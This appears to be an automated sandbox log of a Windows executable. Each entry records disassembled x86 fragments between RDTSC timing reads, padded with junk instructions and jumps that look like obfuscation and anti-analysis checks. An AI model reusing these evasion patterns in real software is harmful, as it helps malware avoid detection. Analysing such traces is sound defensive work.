Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C08E2 second address: 52B0030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 1AF3h 0x00000007 push esi 0x00000008 pop edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e mov cx, 7D47h 0x00000012 movzx eax, dx 0x00000015 popad 0x00000016 leave 0x00000017 pushad 0x00000018 mov ebx, 5C1F73F8h 0x0000001d pushfd 0x0000001e jmp 00007F988C7CE321h 0x00000023 xor esi, 03C079E6h 0x00000029 jmp 00007F988C7CE321h 0x0000002e popfd 0x0000002f popad 0x00000030 retn 0004h 0x00000033 nop 0x00000034 cmp eax, 00000000h 0x00000037 setne al 0x0000003a xor ebx, ebx 0x0000003c test al, 01h 0x0000003e jne 00007F988C7CE317h 0x00000040 xor eax, eax 0x00000042 sub esp, 08h 0x00000045 mov dword ptr [esp], 00000000h 0x0000004c mov dword ptr [esp+04h], 00000000h 0x00000054 call 00007F9891337753h 0x00000059 mov edi, edi 0x0000005b jmp 00007F988C7CE321h 0x00000060 xchg eax, ebp 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F988C7CE328h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0030 second address: 52B0036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0036 second address: 52B0084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988C7CE31Ch 0x00000009 or esi, 5D2F1BD8h 0x0000000f jmp 00007F988C7CE31Bh 0x00000014 popfd 0x00000015 mov di, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007F988C7CE325h 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F988C7CE31Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0084 second address: 52B00ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988D0B0297h 0x00000009 adc eax, 2475F8AEh 0x0000000f jmp 00007F988D0B0299h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007F988D0B028Ch 0x00000021 push FFFFFFFEh 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F988D0B0297h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00ED second address: 52B00F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00F3 second address: 52B00F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00F7 second address: 52B0127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 003EEE11h 0x00000010 jmp 00007F988C7CE31Fh 0x00000015 xor dword ptr [esp], 76A47059h 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0127 second address: 52B014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, cl 0x00000006 popad 0x00000007 mov eax, edx 0x00000009 popad 0x0000000a call 00007F988D0B0289h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F988D0B0292h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B014E second address: 52B016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988C7CE321h 0x00000008 mov ax, 40B7h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B016F second address: 52B0174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0174 second address: 52B01C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F988C7CE31Bh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F988C7CE329h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F988C7CE31Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01C4 second address: 52B01CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01CA second address: 52B0266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F988C7CE31Ch 0x00000013 xor cl, FFFFFFC8h 0x00000016 jmp 00007F988C7CE31Bh 0x0000001b popfd 0x0000001c mov ch, C0h 0x0000001e popad 0x0000001f mov eax, dword ptr fs:[00000000h] 0x00000025 jmp 00007F988C7CE31Bh 0x0000002a nop 0x0000002b jmp 00007F988C7CE326h 0x00000030 push eax 0x00000031 jmp 00007F988C7CE31Bh 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F988C7CE31Bh 0x00000040 add eax, 12418F1Eh 0x00000046 jmp 00007F988C7CE329h 0x0000004b popfd 0x0000004c mov bx, ax 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0266 second address: 52B02F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988D0B0293h 0x00000008 mov si, CCCFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f sub esp, 18h 0x00000012 pushad 0x00000013 call 00007F988D0B0290h 0x00000018 mov esi, 6E2B0E51h 0x0000001d pop ecx 0x0000001e pushfd 0x0000001f jmp 00007F988D0B0297h 0x00000024 and ax, 4F3Eh 0x00000029 jmp 00007F988D0B0299h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 mov ecx, 72BC1023h 0x00000037 push eax 0x00000038 push edx 0x00000039 call 00007F988D0B0296h 0x0000003e pop eax 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B02F5 second address: 52B0357 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx edi, ax 0x0000000d push eax 0x0000000e mov bh, BAh 0x00000010 pop esi 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 jmp 00007F988C7CE323h 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ecx, edi 0x0000001e pushfd 0x0000001f jmp 00007F988C7CE327h 0x00000024 xor ch, FFFFFFBEh 0x00000027 jmp 00007F988C7CE329h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0357 second address: 52B037B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F988D0B028Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B037B second address: 52B038D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B038D second address: 52B03CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f pushfd 0x00000010 jmp 00007F988D0B0290h 0x00000015 add eax, 3FA9BA78h 0x0000001b jmp 00007F988D0B028Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03CD second address: 52B03E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03E8 second address: 52B03EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03EE second address: 52B03F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03F2 second address: 52B0401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0401 second address: 52B043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F988C7CE326h 0x0000000f mov eax, dword ptr [769B4538h] 0x00000014 pushad 0x00000015 mov cx, 702Dh 0x00000019 mov si, E229h 0x0000001d popad 0x0000001e xor dword ptr [ebp-08h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B043F second address: 52B0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0443 second address: 52B0454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0454 second address: 52B045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B045A second address: 52B045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B045E second address: 52B0488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F988D0B028Bh 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0488 second address: 52B055C instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F988C7CE322h 0x0000000d add esi, 6DF4A8B8h 0x00000013 jmp 00007F988C7CE31Bh 0x00000018 popfd 0x00000019 popad 0x0000001a nop 0x0000001b pushad 0x0000001c mov ebx, eax 0x0000001e call 00007F988C7CE320h 0x00000023 mov esi, 03EC3171h 0x00000028 pop ecx 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F988C7CE31Ch 0x00000030 nop 0x00000031 jmp 00007F988C7CE320h 0x00000036 lea eax, dword ptr [ebp-10h] 0x00000039 pushad 0x0000003a push eax 0x0000003b pushad 0x0000003c popad 0x0000003d pop ebx 0x0000003e pushfd 0x0000003f jmp 00007F988C7CE328h 0x00000044 and cx, 67D8h 0x00000049 jmp 00007F988C7CE31Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov dword ptr fs:[00000000h], eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F988C7CE31Bh 0x0000005f adc eax, 01751A9Eh 0x00000065 jmp 00007F988C7CE329h 0x0000006a popfd 0x0000006b mov esi, 76887E67h 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B055C second address: 52B05A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988D0B0293h 0x00000009 sub esi, 14E0A4AEh 0x0000000f jmp 00007F988D0B0299h 0x00000014 popfd 0x00000015 mov ecx, 587FC537h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [ebp-18h], esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B05A4 second address: 52B05B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B05B3 second address: 52B0622 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F988D0B028Ch 0x00000016 xor si, BBB8h 0x0000001b jmp 00007F988D0B028Bh 0x00000020 popfd 0x00000021 mov ah, 17h 0x00000023 popad 0x00000024 mov ecx, dword ptr [eax+00000FDCh] 0x0000002a jmp 00007F988D0B028Bh 0x0000002f test ecx, ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F988D0B0295h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0622 second address: 52B06C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988C7CE327h 0x00000009 jmp 00007F988C7CE323h 0x0000000e popfd 0x0000000f movzx ecx, di 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jns 00007F988C7CE350h 0x0000001b pushad 0x0000001c movsx edi, cx 0x0000001f pushfd 0x00000020 jmp 00007F988C7CE31Ah 0x00000025 sub ecx, 2F86CA08h 0x0000002b jmp 00007F988C7CE31Bh 0x00000030 popfd 0x00000031 popad 0x00000032 add eax, ecx 0x00000034 jmp 00007F988C7CE326h 0x00000039 mov ecx, dword ptr [ebp+08h] 0x0000003c jmp 00007F988C7CE320h 0x00000041 test ecx, ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F988C7CE327h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B06C5 second address: 52B06DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0294h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B06DD second address: 52B06E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A01E4 second address: 52A0223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, 1C52h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F988D0B0296h 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F988D0B0297h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0223 second address: 52A0254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 741DBEBAh 0x00000008 call 00007F988C7CE31Bh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 jmp 00007F988C7CE31Fh 0x00000018 sub esp, 2Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0254 second address: 52A0258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0258 second address: 52A025E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A025E second address: 52A0284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F988D0B0290h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0284 second address: 52A0288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0288 second address: 52A028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A028E second address: 52A0294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0294 second address: 52A02C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push esi 0x0000000b mov dl, CBh 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F988D0B028Ah 0x00000015 mov dword ptr [esp], edi 0x00000018 pushad 0x00000019 mov dh, al 0x0000001b call 00007F988D0B0293h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A02F1 second address: 52A02F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A02F5 second address: 52A02FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A02FB second address: 52A0375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988C7CE321h 0x00000009 xor ah, FFFFFFC6h 0x0000000c jmp 00007F988C7CE321h 0x00000011 popfd 0x00000012 mov ax, 1577h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub edi, edi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F988C7CE329h 0x00000022 add ch, FFFFFFD6h 0x00000025 jmp 00007F988C7CE321h 0x0000002a popfd 0x0000002b mov ah, 08h 0x0000002d popad 0x0000002e inc ebx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 call 00007F988C7CE31Fh 0x00000037 pop esi 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A042D second address: 52A0498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F988D0B0290h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, D8h 0x00000013 call 00007F988D0B028Ah 0x00000018 pushfd 0x00000019 jmp 00007F988D0B0292h 0x0000001e sub ecx, 6B9C5B98h 0x00000024 jmp 00007F988D0B028Bh 0x00000029 popfd 0x0000002a pop eax 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F988D0B0292h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0498 second address: 52A04AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A04F7 second address: 52A05B8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F988D0B0298h 0x00000008 or ax, 2518h 0x0000000d jmp 00007F988D0B028Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 jmp 00007F988D0B028Fh 0x0000001b pop eax 0x0000001c popad 0x0000001d js 00007F988D0B02D5h 0x00000023 jmp 00007F988D0B028Fh 0x00000028 cmp dword ptr [ebp-14h], edi 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F988D0B0294h 0x00000032 xor ecx, 3F89A9D8h 0x00000038 jmp 00007F988D0B028Bh 0x0000003d popfd 0x0000003e movzx esi, dx 0x00000041 popad 0x00000042 jne 00007F98FE76E1A6h 0x00000048 jmp 00007F988D0B028Bh 0x0000004d mov ebx, dword ptr [ebp+08h] 0x00000050 jmp 00007F988D0B0296h 0x00000055 lea eax, dword ptr [ebp-2Ch] 0x00000058 pushad 0x00000059 mov esi, 46431EBDh 0x0000005e mov dx, ax 0x00000061 popad 0x00000062 xchg eax, esi 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 mov ah, 79h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A05B8 second address: 52A05D5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F988C7CE31Dh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov di, 5E74h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A05D5 second address: 52A0605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F988D0B0295h 0x0000000a xor ch, FFFFFFE6h 0x0000000d jmp 00007F988D0B0291h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0605 second address: 52A060B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A060B second address: 52A060F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A060F second address: 52A061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A061E second address: 52A0624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0704 second address: 5290E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F98FDE8C258h 0x0000000f xor eax, eax 0x00000011 jmp 00007F988C7A7A4Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e cmp eax, 00000000h 0x00000021 setne cl 0x00000024 xor ebx, ebx 0x00000026 test cl, 00000001h 0x00000029 jne 00007F988C7CE317h 0x0000002b jmp 00007F988C7CE48Bh 0x00000030 call 00007F98913183B5h 0x00000035 mov edi, edi 0x00000037 jmp 00007F988C7CE327h 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F988C7CE325h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290E31 second address: 5290E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290E37 second address: 5290E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290E3B second address: 5290E9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F988D0B0296h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov cl, 07h 0x00000012 jmp 00007F988D0B0293h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F988D0B028Bh 0x00000023 jmp 00007F988D0B0293h 0x00000028 popfd 0x00000029 push esi 0x0000002a pop edx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290E9A second address: 5290ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988C7CE31Bh 0x00000009 adc ch, 0000006Eh 0x0000000c jmp 00007F988C7CE329h 0x00000011 popfd 0x00000012 push eax 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edx, 672AE7DAh 0x00000020 mov bh, A7h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290ED7 second address: 5290EF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290EF0 second address: 5290EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290EF5 second address: 5290F15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0295h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f popad 0x00000010 rdtsc
